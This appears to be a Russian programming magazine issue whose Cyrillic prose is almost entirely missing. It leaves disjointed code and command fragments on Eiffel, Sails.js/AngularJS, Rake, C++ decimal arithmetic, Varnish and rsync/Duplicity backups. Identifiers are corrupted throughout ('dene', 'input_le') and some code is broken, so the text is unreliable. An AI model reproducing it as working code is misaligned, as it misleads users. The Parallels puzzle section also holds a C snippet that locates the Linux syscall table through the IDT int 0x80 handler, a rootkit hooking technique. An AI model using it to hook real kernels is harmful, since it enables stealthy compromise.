AutoTest.
,
01 /192/ 2015
1999 ,
. .
.
, , . AutoTest
, , , .
. Eiffel,
. car nullptr,
( ) car->drive();. ,
car nullptr .
, ,
. Void
Safety.

, C/C++, C# Java,
, .
, ,
- , .
Eiffel ! SCOOP (Simple Concurrent
Object-Oriented Programming) Eiffel
, .
, EiffelStudio
. , ( UML-),
, Eiffel-, -
01 /192/ 2015
93
, , ,
.

Eiffel, . 12 ,
, . EiffelBase, . ,
, Eiffel: . EiffelVision 2 -
, , -
: Windows, UNIX, Linux, VMS .
Windows.
WEL (Windows Eiffel Library) Win32 API ( ) , : , ,
, Win-,
. EiffelCOM , Microsoft (
). - EiffelNet
. EiffelTime . EiffelStore
ODBC, :
Oracle, SQL, Ingres, Sysbase. EiffelThread ,
Windows NT, UNIX
x86/64, SGI Cray. Eiffel2Java
, Eiffel, Java-, , .
EiffelWeb Eiffel
HTML-, , CGI. EiffelLex EiffelParse
.

, .
,
! , Eiffel Software, ,
Open Source.
EIFFELSTUDIO
EiffelStudio Eiffel. : EiffelStudio Enterprise Evolution Edition
GPL.
,
.
EiffelStudio . ...
EiffelStudio Xcode
, , .
Apple Downloads for Apple Developers (https://
developer.apple.com/downloads/index.action,
, Apple ID), , , Command Line Tools (OS X 10.9) for
Xcode,
Late December 2014.
.
.
,
Xcode, ; ,
EiffelStudio.
94

X11. ,
XQuartz, Apple. :
Eiffel IDE,
XTerm, . XQuartz xquartz.macosforge.org.
. 2.7.7.
MacPorts, UNIX- OS X.
EiffelStudio. MacPorts,
: https://distfiles.
macports.org/MacPorts/MacPorts-2.3.1-10.9-Mavericks.pkg.
,
- . .
, Eiffel. XTerm : sudo port install
eiffelstudio. ,
.
,
, .
,
, . ,
XTerm bash ( ),
. ,
XTerm, , : cat >> ~/.bash_prole. :
01 /192/ 2015
note
description : "consoleproject1 application
root class"
date
: "$Date$"
revision
: "$Revision$"
export ISE_PLATFORM=macosx-x86-64
export ISE_EIFFEL=/Applications/MacPorts/Eiffel_13.11
export GOBO=$ISE_EIFFEL/library/gobo/svn
export PATH=$PATH:$ISE_EIFFEL/studio/spec/
$ISE_PLATFORM/bin:$GOBO/../spec/$ISE_PLATFORM/bin
class
, , <Ctrl
+ D> . ,
bash, : source
~/.bash_prole.
, !
EiffelStudio, estudio.
, , ! , ,
. - .
feature {NONE} -- Initialization
APPLICATION
inherit
ARGUMENTS
create
make
EIFFELSTUDIO
, EiffelStudio .
,
.
.
.
, . Basic
application (no graphics library included) , Graphics application, multiplatform, with EiffelVision 2 , .
,
Create.
, . EiffelStudio
, , Compile Project,
OK. ,
.
, OK, EiffelStudio
. Eiffel- (
Groups APPLICATION). :
make
-- Run application.
do
--| Add your code here
print ("Hello Eiffel World!%N")
end
end
. .
note , , ,
. class . Eiffel
, inherit . create
, , ,
. feature .
( NONE)
. , NONE private
C++, .
: ANY public ( ) CHILD protected (
, ).

( inherit). feature
make (). do,
end. , Eiffel ,
.
print, .
(--).
, , Project
01 /192/ 2015
95
Finalize. , C- .
,
Hello Eiffel World!.
*.e.
EiffelStudio Application
Wizard
,
. (,
application.e) input.rtf (OS
txt) .
feature :
input_le: PLAIN_TEXT_FILE
output_le: PLAIN_TEXT_FILE
:
, var. PLAIN_TEXT_FILE
, ASCII-.

, :
, EiffelVision, EV_APPLICATION.
, ,
(
GTK),
.
EV_APPLICATION , EV_TIMEOUT ( ) ; , EV_COLOR
. first_window MAIN_WINDOW.
make_and_launch default_create, EV_
APPLICATION, prepare ( MAIN_WINDOW), ,
launch ,
.
create input_le.make_open_read ("input.rtf")

create output_le.make_open_write ("output.rtf")
. Eiffel : .
(, ).
. Eiffel ,
:
from
input_le.read_character
until
input_le.exhausted
loop
output_le.put (input_le.last_character)
input_le.read_character
end
from .
read_character last_
character input_file
. until . , exhausted ,
, (
), , loop.

.
close :
input_le.close
output_le.close
, .
, ,
, .

EiffelStudio Graphic application,
multi-platform, with EiffelVision 2. , ,
, :
, .
, ,
.
Eiffel
(C-) : ,
, , ; ,
; , , ;
.
, .
,
(. . - , ).
,
Eiffel. ,
! ,
. , , .
,
, . Eiffel
, Eiffel_Examples : -.
Eiffel ,
Delphi, C#, Ruby . , ,
, .
, C
,
, , C
,
.
01 /192/ 2015
Kostyantyn Ivanyshen@shutterstock.com
96

aka Spider_NET
iantonov.me
iantonov.me
:

JavaScript.
, ,
JS-

. (
,
),
.
Sails.js,

Node.js , .
SAILS.JS MVC-
ode.js ,
, ,

JavaScript .
RoR, Yii ASP .NET MVC. JavaScript
,
.
-,
,
Sails.js.

Sails.js Derby,
Meteor, Rendr, Geddy Tower. ,
Derby. ,

.
INFO

RoR, Sails.js

.
Derby
,
.
01 /192/ 2015

Derby,
, GitHub Sails.
js. ,

RoR , . ,

( . . . .
) Sails.js
,
,

.
SAILS.JS
97
1.
LAYOUT.EJS
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title><%- title %></title>
<link rel="stylesheet"
href="/styles/style.css">
</head>
<body ng-app="todoapp">
<%- body %>
</body>
<script src="//cdnjs.cloudare.com/ajax/
libs data-main="/js/main.js">
</html>
Sails.js
. , ,
RESTful API Sails.js
. ,
API
(CRUD,
, ) .
,

. ,

Sails.js.
Sails.
js ,
(sailsjs.org).

,
.
, Sails.js
MVC-.

(RoR, Yii, CodeIgniter, ASP .NET MVC)
Sails.js
,
,
. MVC : models, views, controllers
JavaScript- .
Sails.js
-, .
.
, socket.io. , Sails.

js- . backend Sails.js,
! frontend AngularJS.
Node.js,
, .

RequireJS.
,

.
.
!
? !
,
. ?

? , .
window.name = 'NG_DEFER_BOOTSTRAP!';
. Node.
.
js, NPM Sails.js. Sails.js require.cong({

'baseUrl': '/js',
, UNIX-like (Linux,
'paths': {
OS X, BSD). Windows
/.
'angular': '//ajax.googleapis.com/ajax/

libs/angularjs/1.2.16/angular'
,
, },
'shim': {
.
.
'angular': {

,
'exports': 'angular'
Linux-,
Sails.js }
,
}

.
DigitalOcean. DO });
Sails.js
ORM
require([
Ubuntu Node.js, Waterline. ,
'angular',

'app'
.
], function (angular, app) {
. .
angular.element(document.getElementsByTagName

('html')[0]);
,
angular.element().ready(function() {

: MySQL, PostgreSQL, Redis,
angular.resumeBootstrap([app.name]);
Sails.js MongoDB, });
sudo npm -g install sails.

});
.

,
.
2.
REQUIREJS
98
01 /192/ 2015
3.
ANGULAR
dene(function(require){
var angular = require('angular'),
Controllers = angular.
module('controllers', []);
Controllers.
controller('TodoCtrl',
require('controllers/TodoCtrl'));
return Controllers;
})
Sails.js
, : goo.gl/lVjEYG.
BitBucket, . ,
.
, : sails new
todo.
. .
,
MVC ,
;), assets.
,
. CSS/HTML/
JS/ .
, sails lift
( 1337). ,
.
REQUIREJS

CDN, .
, CDN ,
Angular
Require. ,
.
RequireJS.
,
, . RJS . :

.
OK, RJS. ,
.
-. Sails.js
, Layout (). (
- ASP .NET MVC) , .
Sails.js - , EJS.
, -
01 /192/ 2015

.
views/layout.
ejs,

1.
, <%-%>.
. title body.
body
require.
js CDN CloudFlare.
data-main script.
(main.js),
.
AngularJS-,

body. ng-app. AngularJS
,

(

. . .).
REQUIREJS
99
4.
TODOAPP
dene([
'angular',
'controllers'
], function (angular) {
app = angular.module('todoapp',
['controllers']);
return app;
});
.
(

),
.

: sails generate controller
welcome.
WelcomeController.js api/
controllers.
module.
exports:
index: function(req, res) {

res.view('welcome', {
title: " !!"
});
}
5.
TASK
attributes: {
"title": {
"type": "string",
"required": true
},
"completed": {
"type": "boolean",
"defaultsTo": false
}
main.js assets/js.
,

,
AngularJS.
2.
CDN,
path. shim ( ),
AMD- ( ) .
AngularJS, .
6.

, Angular.
, , (
angular.module) require , RequireJS.
controllers.js assets/js
RJS- 3 (, , ,
:). . .).
Angular angular.module.
.
TodoCtrl,
assets/js/controllers. . - . !
AngularJS RJS- ( app.js assets/js), todoapp .
4.

, . ,
Sails.js
(index).

welcome (. view).
view ,
.
title,
.
, .
routing.js config
TODOCTRL
$scope.todos = [];
$http.get('/task/nd').success(function(data) {
for (var i = 0; i < data.length; i++) {
data[i].index = i;
}
$scope.todos = data;
});
//
$scope.addTodo = function() {
if (!$scope.newTodo.length) {
return;
}
$http.get('/task/create?title=' + $scope.newTodo).
success(function(data) {
$scope.todos.push({
title: $scope.newTodo,
completed: false
});
$scope.newTodo = '';
});
};
100
01 /192/ 2015
Welcome
API
, API CRUD.
API .
: title (string) completed (boolean). ,
, ( ).
.
. (email, url, post code
).
, API.
:
your_host:1337/task/create?title=cc&completed=false
your_host:1337/task/create?title=cc2&completed=false
'/': {
controller: 'WelcomeController',
action: 'index'
}
"/",
. welcome.ejs
views .

,
.
(sails lift).
, API
,
,
API. task .
sails generate api task. -
01 /192/ 2015
101
JSON-. , , .
,
.
,
:
your_host:1337/task/nd

,

,
API. . , . todoList.ejs views
.

AngularJS. :
xakep.ru/anglurjs/ ( , .
. .). .
todos.
, c (, , ).
assets/js/
controllers/TodoCtrl.js. 6. , . $http API.
,
find.

JSON. Get ,
.
. $scope.
.
addTodo(),
, .
.

Get. , Post.

.
(, ) , $http. ,
put, delete.

, .

. !
, !

.

, .

.
,
. , .
Sails.js
, . , -
JavaScript. !
CoffeeScript -: , .
. CS,
Sails.js.
:
coffee-script: npm install coffee-script --save
(app.js) :
require('coffee-script/register');
API (, )
--coffee. , sails generate api mymodel - coffee.
Sails.js ( )
. , , .
.
goo.gl/YZaSX5
Sails.js.

Sails.js.
goo.gl/iQq7Ik Sails.js
+ Reactive.js + Backbone.js.

-.
goo.gl/AlKm99 Passport
Sails.js. Sails.js, .
goo.gl/D9Zv4n Sails.js.
goo.gl/BttFnr ,
Sails.js. .
goo.gl/2PZh2r ORM Waterline.
https://bitbucket.org/iantonov/todo/
.
goo.gl/tLpBOZ AngularJS.
102

ovchinnikov.cc

RAKE
01 /192/ 2015

.
IDE .
:

, - ,
,
.
Continuous Integration , ,
- (
- ).

batch- shell-,
-
.
, ,
.
,
, .
, ,
XML, , , ,
.

, , XML
. ,
(,
/ - ),
, (
, ,

), , , , , . ,
, ?

. Rake -
Ruby on Rails Ruby-,
, .NET, .
Rake , Ruby. , .
, Make, Ant MSBuild, .
Rake:
01 /192/ 2015
103
DSL Ruby
XML ;
;
;
,
;
.
Rake Ruby.
, 1.9, , . Ruby 1.8

Rake, ,
RubyGems,
gem install rake
Rake
Rakefile.
(tasks). , , .
task name: [:prereq1, :prereq2]

, Ruby (block).
task name: [:prereq1, :prereq2] do |t|

# actions
end
RAKE
Thor
Thor (whatisthor.com) (Yehuda Katz)
Ruby. Ruby-
Rake, , ,
Ruby, Rake DSL . ,
.
Grunt
Grunt (gruntjs.com) - JavaScript, a . -.
Paver
Rake :
.
, . task.

( , ). ,
(). file.
, , Rake.
Python Ruby, Rake

Paver (paver.github.io/paver/). Rake
, Python , .
rake task_name
Java
, Ant Maven, XML-. Gradle (www.gradle.org)
Groovy DSL.
Rake , Rakefile default.

, rake .
Gradle
>rake
rake aborted!
Don't know how to build task 'default'
rake-.
Rake Ruby-
#,
desc.
, rake -T,
. , -

rake -T
Rake (namespaces)
. , , Ruby on Rails, rake db:migrate,
db , migrate , . namespace.
namespace :namespace_name do
# tasks
end
RAKE-
Rake Rakefile.
, -
104
01 /192/ 2015
desc "Clean the artefacts from previous build"

task :clean do
rm Dir.glob('*.exe')
rm_rf(out_dir) if Dir.exists?(out_dir)
end
desc "Compile project with MSBuild"
task :build do
mkdir_p(out_dir) if !Dir.exists?(out_dir)
project = "#{proj_root}/hello.proj"
cmd = "\"#{msbuild}\" #{project}"
sh cmd do |ok, res|
raise "*** BUILD FAILED! ***" if !ok
end
end
desc "Prepare deploy package"
task :pkg do
artefacts = ["#{proj_root}/hello.exe",
"#{proj_root}/readme.txt"]
cp_r(artefacts, out_dir)
end
. : rakelib,
rake. , rake-, Rakefile.

Rake-
:
(Clean) .
exe- out.
(Build) , . MSBuild
proj- .
(Package) exe out,
Read Me.
.NET- RAKE
, Rake
Ruby/Rails-.
. Hello world C#. Rake
.NET- ,
/
/ , XML NAnt MSBuild
.

,
MSBuild. , ,
.
default , , ,
rake ,
clean, build package. ,
Rakefile, Ruby-, require , .
using System;
public class HelloWorld
{
static void Main()
{
char hello="hello";
Console.WriteLine(hello);
Console.ReadLine();
}
}
WWW
Rake
GitHub:
https://github.com/
jimweirich/rake
Rake:
docs.seattlerb.org/rake/

Albacore:
https://github.com/
Albacore/albacore
, Rake
.NET-.
Albacore, DSL Rake
,
Microsoft.

gem install albacore

,
Albacore:
require "albacore"
desc "Compile project with MSBuild using Albacore"
build :alba_build do |b|
b.le = "#{proj_root}/hello.proj"
end
<Project xmlns="http://schemas.microsoft.com/
developer/msbuild/2003">
<ItemGroup>
<Compile Include="hello.cs" />
</ItemGroup>
<Target Name="Build">
<Csc Sources="@(Compile)"/>
</Target>
</Project>
, .
Albacore
Wiki GitHub.
Rake- , , .
require "leutils"
task :default => [:clean, :build, :pkg]
msbuild = "#{ENV['WINDIR']}\\Microsoft.NET\\Frame
work\\v3.5\\msbuild.exe"
proj_root = File.dirname(__FILE__)
out_dir = "#{proj_root}/out"
ALBACORE
DVD.XAKEP.RU

.
Rake , .
Ruby ,
.NET-.
, Ruby
. ,
legacy-, ,
( , COM- ) .
420 !
: ?
-, . .
-, .
, . -, (,
): , .
http://shop.glc.ru
6 ( 5%) 2394 .
12 ( 15%) 4284 .
106
01 /192/ 2015
PARALLELS
( ,
). IT-
.
( ,
, ). Parallels
, !
1

lozovsky@glc.ru
, ,
Linux .
,
.
int what_sz = 3;
char what[] = "\xff\x14\x85";
void *
abcdefh(void)
{
void *tmp;
uint8_t **ptr;
struct idtr idtr;
PARALLELS
1
. ,
,
( 1/4 ),
( 1). , , (
2). .
struct idt *idt;

__asm__("sidt %0" : "=m" (idtr));
idt = (struct idt *) (idtr.base +
(0x80 * 8));
tmp = (void *)((idt->off2 << 16) |
idt->off1);
ptr = memmem(tmp, 0x100,
what, what_sz);
if (ptr == NULL)
return NULL;
ptr += 3;
return *ptr;
}
: .
( , ).
1. . , , ,
. .
.
2. . ,
, , .
,

.
() , .
: , Hello, fork() . .
, libc / ,
.
,
,
.
HelloHello.
4
. ,
107
01 /192/ 2015
00 00 00 00 00 00 00 00 00 04 00 00 00 65 01 00 00 00
03 00 00 00 65 01 00 00 00 04 00 00 00 66 01 00 00 00
67 01 00 00 00
, .
: ?

HEX View:
04
09
69
69
68
00
00
00
6C
6E
01
02
00
46
65
65
00
00
TEXT View:
......Hello World!..ConcatenatedStringExample..First
string part..Second string part.........
(.............................................e.......
e........f....g....
00 0C 00 54 65 73 74 46 69 6C 65 4E 61 6D 65
69 72 73 74 4C 69 6E 65 0E 00 54 65 73 74 46
48 61 6E 64 6C 65 0A 00 53 65 63 6F 6E 64 4C
01 00 00 00 09 03 00 00 00 00 00 05 00 00 00
00 00 69 01 00 00 00 01 00 00 00 6B 01 00 00
00 00 6B 01 00 00 00 04 00 00 00 6A 01 00 00 00

HEX View:
07
00
6E
66
00
00
00
00
00
00
00
TEXT View:
......TestFileName..FirstLine..TestFileHandle..SecondLine
...............h....i........k........k........j....

HEX View:
04
19
6E
74
20
00
00
00
00
67
72
73
00
00
IT-
00
43
45
69
74
00
00
00 0C 00 48 65 6C 6C 6F 20 57 6F 72 6C 64 21
6F 6E 63 61 74 65 6E 61 74 65 64 53 74 72 69
78 61 6D 70 6C 65 11 00 46 69 72 73 74 20 73
6E 67 20 70 61 72 74 12 00 53 65 63 6F 6E 64
72 69 6E 67 20 70 61 72 74 01 00 00 00 05 02
28 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00
61
73
6F
05
00
00
65
65
00
00
00
73
20
6D
05
00
00
02
02
02
0B
70
04
20
00
00
00
00
00
00
00
65
00
02
00
00
00
00
00
00
44
72
74
00
00
00
00
00
00
00
72
73
68
48
22
00
08
06
01
6C
65
6B
65
46
00
00
00
00
00
01
61
79
20
02
00
00
00
00
00
00
6D
0A
04
00
00
00
00
00
00
00
77
00
00
00
00
00
65
65
68
00
6F
47
54
00
00
00
02
02
02
02
72
72
65
09
00
00
00
00
00
00
6C
65
6D
07
00
00
00
00
00
00
64
65
70
00
00
00
00
00
00
00
21
74
05
00
00
00
03
04
69
6A
09
69
00
00
00
00
00
00
01
01
TEXT View:
......Dreamworld!..Kaspersky..Greetings ..the ..Temp

..from ..HF................".......................
................e........e........e........e........h..
..i........l........j....
- ,
, . lozovsky@glc.ru
. , , . , , , .
. ,
fork()
,
,
.
.
,
, .
:
fork()
pid. ,
-
00
4B
67
72
00
00
00
00
00
00
00
.
,
.
, ,
.
5
. 32 ,
. ,
16 ,
'a'.
, ,
RISC ,
, .
4 , 8.
. 64
8 , 32 .
MSVC
GCC, 64
, 32.
6
, , , "seq_lock".
7
: 24.
++
108
01 /192/ 2015
qua ,
qualab@gmail.com
,
!
109
, , !
01 /192/ 2015
. ,

.

3,4999990123 3,5
, ,

,
.
,

,

.

,
. ,

,
. , real Pascal ,
,
.
, , , .
,
N ( , N = 2), (
). :
,
, . , , , ,
, . , ,
,
, .
, , . , ,
, .
, , -,
, , ,
, . .

, ,
IEEE 754.
single-precision ( )
double-precision ( ) floating-point ( ).
:
32 , , , 64 .
2, , :
x = m * 2e,
1 <= |m| < 2; m, e
x = m * Ne,
:
m e , .
, , 1 <= |m|
< N, ,
, ,
.
, , , . ,
N (
, N = 2),
23
11
52
, IEEE 7542008
, . C/
C++, float double, long double,
Microsoft,
Visual C++ double.
, ,
.
, , float double.
110
++
0,
1 .
, ,
, ,
.

, , 1,

, .

.
, , : 223 + 1 =
= 16 777 216; ,

. ,
, ,
123 456,78 , -,
, . ,
1 234 567 890,
32- ,
! , , C++
double.
15 : 252+1 = 9 007 199 254 740 992
32- ,
64- (19 ), , , . ,
.
. ,
2,
.
,
,
( biased exponent ).

, 127, 1023.
,
. !
01 /192/ 2015

, . 640 (= 512 + 128)
:
0;
, 512 , , 640/512 = 512/512 + 128/512
1 + 1/4, 1,01, ,
0100000 00000000 00000000;
1 + 1/4 640, , 9,
29 = 512, , , ,
127, 127 + 9 = 128 + 8, : 10001000.
,
, 1023 + 9 = 1024 + 8,
: 100 00001000. ,
, .
: :
(INF ), , -- (NaN not-anumber).
,
, 1, ,
,
: ,
.
, /++ .
, ,
.
10308,
1038.
1019, 64- , ,
- ,
.
. 23
8- . , 15 , , ,
6 , , 9 . ,
.
,
, ,
.
111
, , !
01 /192/ 2015

,
,

!
, . -, ,
C/C++, C# Python,
Decimal,

.
, C++,

, ? ,
: ,
, Decimal .

.
,
, , 64 .
,

18
.
64- . ,

.
, 18 ,

.
!
. , , n f,
x = n + f * 1018,
n, f

,
: , ,
,

, , .

. -,

, .

,
. :
x = a + b * 1018,
y = c + d * 1018,
z = x + y = e + f * 1018,
a, c, e: int64_t;
b, d ,f: uint64_t;
0 <= b, d, f < 1018,
z = (a + b * 1018) + (c + d * 1018)
e = a + c + [b * 1018 + d * 1018]
f = {b * 1018 + d * 1018} * 1018
, 0 <= f < 1018.
64- , , .
class decimal
{
...
private:
int64_t m_integral;
uint64_t m_fractional;
};
, , ,
1018 : f = (x n) * 1018.
, ,
1,67 : n = 2 f = 0,33 * 1018. ,
.
[n] ,
{n} . ,
. 1018 64- uint64_t (
112
++
), , , :
e = a + c + (b + d) div 1018,
f = (b + d) mod 1018.
, a c. ,
, b d 1018, , (b + d) < 2 * 1018, ,
,
:
e = a + c;
f = b + d;
if (f >= 1018) f -= 1018, ++e;
e .
- ,
. .
e = a - c;
if (b >= d) f = b - d;
else f = (1018 - d) + b, --e;
. .

.
, , 1018, Q-,
, 109.
1018 , , 64- ,
C++.
? , :
a = sa * a1 - a2 * 10-9; b = b1 - b2 * 10-9;
c = sc * c1 - c2 * 10-9; d = d1 - d2 * 10-9;
0 <= a2, b2, c1,2, c1,2 < 109;
sa,c = sign(a), sign(c)
0 <= a1, 1 < MAX_INT64 / 109
:
U = (a1, a2, b1, b2),

V = (c1, c2, d1, d2)T,
A = V * U,
| a1*c1 a1*c1 b1*c1
A = | a1*c2 a1*c2 b1*c2
| a1*d1 a1*d1 b1*d1
| a1*d2 a1*d2 b1*d2
b2*c1
b2*c2
b2*d1
b2*d2
|
|
|
|
,
. A11 = a1 * c1 MAX_INT64 / 1018, : A12 = a1 * c2 A21 = a2 * c1
MAX_INT64 / 109. ,
:
e = A11*1018 + (A12+A21)*109 + (A13+A22+A31) + (A14+A23+A32+A41) div 1018,

f = (A14+A23+A32+A41) mod 1018 + (A24+A33+A42) + (A34+A43) div 109
01 /192/ 2015
A44 div 1018 ,

.
, ,
MAX_INT64. ,
uint64_t
. ,
,

se = sa xor sc :
, . ,
, ,
. ,

C++.

,
.

x1
x1.
,
y = x1 = 1/(a + b * 1018)
= c + d * 1018

x.
x (
),
.
a = 0, :
y = 1 / (b * 1018) = 1018 / b,
e = 1018 div b,
f = 1018 mod b;
b = 0, a = 1, y = e = 1, f = 0;
ec b = 0, a > 1, :
y = 1 / a,
e = 0, f = 1018 div a.
, x
,
:
a > 1, b != 0, :
y = 1 / (a + b * 1018) < 1,
e = 0,
f = 1018 / (a + b * 1018).
10,
a, :
k = max(k): 10k <= a,

u = 1018, v = (a * 1018-k + b div 10k);
f = (u / v) * 1018-k,
for (++k; k <=18; ++k)
{
u = (u % v) * 10;
if (!u) break; //
f += u / v * 1018-k;
}
01 /192/ 2015
113
, , !

,
.
0 18 , , .

, float
double decimal.
decimal::decimal(double value)
: m_integral(static_cast<int64_t>(std::oor(value))
m_fractional(static_cast<int64_t>(std::oor(
(value - m_integral) * 1018 + 0.5))
{
normalize();
}
void decimal::normalize()
{
uint64_t tail = m_fractional % 103;
if (tail)
{
if (tail > 103/2)
m_fractional += 103 - tail;
else
m_fractional -= tail;
GITHUB
}
}

103 , ,
, double
decimal,
.

, 1018-15
.
, .
double
decimal. ,
, double
int64_t,
decimal
.
float , :
1018-7 = 1011.
decimal , m_integral.
m_integral, m_
fractional.
decimal double float :
return m_integral + m_fractional * 10-18;

.
, , ,
decimal separator ,
. m_precision
.
, . ,
, , ,
, .

, decimal, .
, !
, C/C++ . ,

Python C#, 1518
, .
decimal , int64_t. ,
double float

, .
,
decimal .
, .

, .
double float,
, . , , ,
, .
, !
Unixoid
114
01 /192/ 2015
Syaheir Azizan@shutterstock.com
urban.prankster
martin@synack.ru

VARNISH
01 /192/ 2015
115

,
-. ,
,
nginx/lighttpd
-. Squid, ,
. Varnish.

Varnish (varnish-cache.org) (reverse) - HTTP.

. ,
,
; , -
. . Varnish
Verdens
Gang. 1.0 2006 , 2014-

4.0.
BSD- , .

,
FreeBSD - (Poul-Henning Kamp) , ( Squid) . , Varnish ,
(Squid
SMP
3.2).
POSIX, . , Varnish
116
Unixoid
Windows.
.
4.0
,
. Varnish ESI (Edge Side Includes),
-
. . Varnish .
(, ) . , ,
. Varnish ,
, .
Squid,
, Varnish HTTP
.
(FTP, SMTP
),
- (Varnish
). , .
Varnish Configuration
Language (VCL) ,
.
(
),

. . VCL
,

,
,
. ( , ),

(rewrite) . , -
01 /192/ 2015
HTTP- , . (round
robin, random DNS, Client IP).
, VMOD (Varnish MODules).
, .
(varnish-cache.org/vmods) ,
.
Varnish
-,
Facebook, Twitter, Vimeo Tumblr.
VARNISH
Varnish
x64- Linux, FreeBSD Solaris.
( EPEL Ubuntu
Universe) Linux *BSD.
Red Hat, Debian, Ubuntu FreeBSD. , .
Windows ( Cygwin),
*nix- . Varnish
3.x 4.x, , 3.x
2015 . , ,
(, 3- , 2011-,
),
. Varnish - .
, - (nginx, lighttpd),
. Varnish HTTP-, . Varnish
.
Varnish Ubuntu 14.04 LTS Apache.
.
/etc/default/
varnish
$ sudo apt-get install apt-transport-https curl

$ sudo curl https://repo.varnish-cache.org/
ubuntu/GPG-key.txt | apt-key add $ sudo echo "deb https://repo.varnis
cache.org/ubuntu/ trusty varnish-4.0"
>> /etc/apt/sources.list.d/varnis
cache.list
$ sudo apt-get update
$ sudo apt-get install varnish
, , .
Varnish - . .
/etc/
default/varnish. .
, :
minimal, c VCL advanced.
.

6081, localhost:6082,
VCL. 256 . , Varnish 80-
, HTTP-, .
advanced,
.
$ sudo nano /etc/default/varnish

#
varnishd

01 /192/ 2015
117
START=yes
#
( ulimit -n)
NFILES=131072
#
(for ulimit -l)

#

MEMLOCK=86000
#

.

-n
INSTANCE=$(uname -n)
#

,
IP
# VARNISH_LISTEN_ADDRESS= ,

VARNISH_LISTEN_PORT=80
# - IP
VARNISH_ADMIN_LISTEN_ADDRESS=127.0.0.1
VARNISH_ADMIN_LISTEN_PORT=6082
# VCL-
VARNISH_VCL_CONF=/etc/varnish/default.
vcl DAEMON_OPTS="\
-a ${VARNISH_LISTEN_
ADDRESS}:${VARNISH_LISTEN_PORT} \
-f ${VARNISH_VCL_CONF} \
-T ${VARNISH_ADMIN_LISTEN_
ADDRESS}:
${VARNISH_ADMIN_LISTEN_PORT} \
. .
Apache, 8080- . ,
:
$ sudo nano /etc/apache2/ports.conf

NameVirtualHost *:8080
Listen 8080
Varnish, HTTP. /etc/default/varnish
-b (-b localhost:8080), VCL-, VARNISH_VCL_
CONF ( example.vcl). , :
$ sudo nano /etc/varnish/default.vcl

backend apache {
.host = "127.0.0.1";
.port = "8080";
}
. Varnish:
$ sudo service varnish start

netstat, -.

, , , Varnish
, . VCL, . ,
, , , . VCL ,
, : , , . ,
. , Varnish Book
(varnish-software.com/static/book). -
default.vcl
(github.com/mattiasgeniar/
varnish-3.0-configuration-templates)
, . VCL.
Varnish
HTTP- (). :
backend server1 {
.host = "10.0.0.11";
}
backend server2 {
.host = "10.0.0.12";
}
,
.
, Varnish
director:
director balanced_servers round-robin {

{
.backend = server1;
}
{
.backend = server2;
}
}
round-robin random.
. VCL-.
default.vcl
118
Unixoid
01 /192/ 2015
sub vcl_recv {
set req.backend = apache
if (req.url ~
"\.(css|js|png|gif|jp(e)?g)")
{
unset req.http.cookie;
}
return (lookup);
if (req.url ~ "^/(cron|install)\.
php$" && !client.ip ~
local)
{
error 404 "Page not found.";
}
if (req.url ~ "^/update\.php$"
return (pass);
}
}
().
,
.
- ,
-,
(
, ).
.
VCL Basics
(varnish-software.com/static/book/VCL_Basics.
html),
(varnish-cache.org/docs).
ACL
URL
.
, .
acl local {
"localhost";
"192.168.1.0"/24;
! "192.168.1.10";
}
,
!, 192.168.1.10
. (client.ip ~ local).
vcl_recv
. , cookie, ,
.
Varnish
cookie. ,
cookie.
cron.php install.php
, , Varnish,
update.php .

varnishadm
, , , . req.http.User-Agent, / . : varnish-cache.org/
docs/trunk/users-guide/devicedetection.html.
return vcl_recv : lookup , pass
. , ,
,
.
, ,
.
, : deliver, fetch, hash,
pipe, error, restart, retry. vcl_hash
, . URL IP/ .
, , ,
. ,
ookie.
vcl_error , -.
. vcl_fetch, vcl_pass vcl_miss. 4.0
vcl_backend_fetch vcl_
backend_response, .
cookie
, .
sub vcl_backend_response {
if (bereq.url ~ "\.(png|gif|jpg)$") {
unset beresp.http.set-cookie;
set beresp.ttl = 1h;
}
}
vcl_deliver. , .
.
Varnish:
sub vcl_deliver {
remove resp.http.X-Varnish;
remove resp.http.X-Powered-By;
}
, , ,
.
VARNISH
Varnish . , -
01 /192/ 2015
119
varnish*. Appendix A:
Varnish Programs Varnish Book.
varnishadm. , ,
. . :
Varnish
Administration Console
.
,
Varnish Plus.
. , Varnish,
Collectd, Nagios, Cacti . varnishcache.org/utilities.

Varnish Collectd
$ sudo varnishadm
Varnish CLI. , help.
(23),
. ,
help . , vcl.* -. :
varnish> vcl.list
param.show param.set , panic.show panic.
clear , ban ban.list , .
varnishtop varnishhist ,
(URL, , ).
top, .
, . , URL :
$ varnishtop -i RxUrl
$ varnishtop -i RxHeader
, (varnishstat)
(varnishlog varnishncsa).
varnishtest
Varnish. ,
, - Varnish
Administration Console (varnish-software.com/resources/vacdemo) , -
Varnish , .
.
.
.
Unixoid
01 /192/ 2015
,

LINUX
? *nix- ,
-. ,
... ?

rommanio@yandex.ru
agsandrew@shutterstock.com
120
01 /192/ 2015
121
( ), , :
, ( ) ? ,
. , , :
.
, , Cron *nix-
.
,
.
.

,
, , .

( ) .
, ,
.
. ,
, , , .
.
, , , .

- .

.
.
RSYNC RSNAPSHOT
rsync
(
/ ),

. :
SSH ( );
,
, ;
rsync
;

, .
INFO

,
.
,

, ,

,

.
$ rsync --progress -e ssh -avz /home/adminuser/

Docs root@leopard:/home/adminuser/backup/
:
-r ;
-l ;
-p (, UGO, ACL
-A -X );
-t mtime;
-o ( ,
, root);
-g ;
-D ;
-a , ( ACL
);
-v ;
-z ;
-e ssh ,
. , SSH , -e 'ssh -p3222';
--progress .
,

,
, .
.
,
( /
) . --fake-super,

( ). ,
rsync , .
ID --numeric-ids.
:
rsnapshot
122
Unixoid
01 /192/ 2015
list-current-files), - ,

restore --fileto-restore. :
$ rsync --progress -e ssh -avz

--rsync-path="rsync
--fake-super" --numeric-ids /home/
adminuser/Docs
adminuser@leopard:/home/admin
user/ backup/
Rsnapshot, , rsync, Perl. ,
.
preexec- postexec-, , , . rsnapshot
, .
Rsync/rsnapshot
,
.

.
$ duplicity restore
--encrypt-key 75E1A006
--le-to-restore 'Downloads'
sftp://adminuser
@leopard//home/adminuser/
backup /home/adminuser
/restore
Duplicity
DUPLICITY DEJA -DUP

, Duplicity
/ .
, ,
(SCP/SSH, FTP,
WebDAV, rsync, HSI...).
:
, Duplicity
Deja-Dup.
,
, , , .
Duplicity
,
rsync/rsnapshot.
,
,
( , tar)...
Duplicity . ACL .
CEDAR BACKUP
Duplicity Deja-Dup
$ duplicity full --encrypt-key

75E1A006 /home/adminuser sftp://
aduser@leopard//home/aduser/
